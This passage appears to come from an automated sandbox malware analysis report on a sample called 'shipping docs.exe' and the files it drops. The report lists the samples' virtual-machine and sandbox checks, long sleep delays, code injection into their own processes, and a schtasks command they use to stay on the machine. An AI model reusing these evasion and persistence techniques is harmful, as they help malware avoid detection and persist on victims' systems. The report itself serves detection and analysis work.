                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yVGAJfiVEvtg.exe PID: 4552, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VMqTMMD.exe PID: 1280, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\shipping docs.exe TID: 2292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exe TID: 1708Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exe TID: 6088Thread sleep count: 9753 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 5596Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 3956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 2092Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 4912Thread sleep time: -23058430092136925s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 3324Thread sleep count: 9727 > 30
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 908Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 1392Thread sleep count: 9676 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\shipping docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\shipping docs.exeWindow / User API: threadDelayed 9753Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWindow / User API: threadDelayed 9727
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWindow / User API: threadDelayed 9676
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeThread delayed: delay time: 922337203685477
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: VMqTMMD.exe, 00000015.00000002.512897668.0000000001029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: shipping docs.exe, 00000003.00000002.514223306.0000000001202000.00000004.00000020.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000003.309409191.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.552042956.0000000006640000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\shipping docs.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_0684DA38 LdrInitializeThunk,3_2_0684DA38
                Source: C:\Users\user\Desktop\shipping docs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\shipping docs.exeMemory written: C:\Users\user\Desktop\shipping docs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeMemory written: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeMemory written: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmpJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Users\user\Desktop\shipping docs.exe {path}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Users\user\Desktop\shipping docs.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
